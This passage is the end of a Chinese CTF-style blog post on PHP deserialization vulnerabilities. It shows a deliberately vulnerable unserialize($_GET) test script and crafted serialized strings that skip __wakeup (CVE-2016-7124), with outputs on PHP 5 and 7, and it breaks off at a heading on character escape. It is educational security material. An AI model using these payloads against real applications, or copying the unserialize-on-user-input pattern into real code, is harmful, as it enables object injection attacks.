        <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;destruct pika_&quot;</span>.<span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-keyword">var</span>;
    &#125;
&#125;

<span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;p&#x27;</span>]);</code></pre></div>
<p>构造序列化字符串：</p>
<div class="code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">pika</span></span>&#123;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$var</span>;
    <span class="hljs-keyword">public</span> <span class="hljs-variable">$q</span>;
&#125;

<span class="hljs-variable">$p</span> = <span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">pika</span>();
<span class="hljs-variable">$p</span>-&gt;<span class="hljs-keyword">var</span> = <span class="hljs-string">&quot;01&quot;</span>;

<span class="hljs-variable">$s</span> = <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$p</span>);
<span class="hljs-keyword">echo</span> <span class="hljs-variable">$s</span>;

<span class="hljs-comment"># O:4:&quot;pika&quot;:2:&#123;s:3:&quot;var&quot;;s:2:&quot;01&quot;;s:1:&quot;q&quot;;N;&#125;</span></code></pre></div>
<p>向测试脚本传参，正常输出：<code>wakeup! destruct pika_01</code></p>
<p>更改序列化字符串：<br><code>O:4:&quot;pika&quot;:3:&#123;s:3:&quot;var&quot;;s:2:&quot;01&quot;;s:1:&quot;q&quot;;N;&#125;</code></p>
<p>php5.5.2版本输出：<code>destruct pika_01</code></p>
<p>php7.0.6版本输出：<code>destruct pika_00</code></p>
<p>可以看到跳过了__wakeup的执行，在php5中，后面成员变量的赋值正常进行，而在php7中，成员变量保持初始状态，未被反序列化字符串赋值。</p>
<p>此外还发现把成员变量的名字的长度更改后__wakeup也不会执行，并且成员变量保持初始状态。</p>
<p>传入：<code>O:4:&quot;pika&quot;:2:&#123;s:4:&quot;var&quot;;s:2:&quot;01&quot;;s:1:&quot;q&quot;;N;&#125;</code></p>
<p>这里”var”的长度本来声明是3，改成了4</p>
<p>输出：<code>destruct pika_00</code>，在php5和php7下表现一致。</p>
<p>猜测这个特性的有效范围与CVE-2016-7124一致，不在此范围的php版本下直接报错退出了。</p>
<h1 id="字符逃逸"><a href="#字符逃逸" class="headerlink" title="字符逃逸"></a>字符逃逸</h1><h2 id="反序列化解析特性"><a href="#反序列化解析特性" class="headerlink" title="反序列化解析特性"></a>反序列化解析特性</h2>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/CTF/" class="category-chain-item">CTF</a>
  
  
    <span>></span>
    
  <a href="/categories/CTF/Web/" class="category-chain-item">Web</a>
  
  

  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/PHP/" class="print-no-link">#PHP</a>
      
        <a href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" class="print-no-link">#反序列化</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>PHP反序列化漏洞整理</div>
      <div>http://pikaball.cc/2023/07/18/PHP反序列化漏洞整理/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>pikaball</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2023年7月18日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2023/07/17/Hexo%E6%93%8D%E4%BD%9C/" title="Hexo操作">
                        <span class="hidden-mobile">Hexo操作</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
</body>
</html>
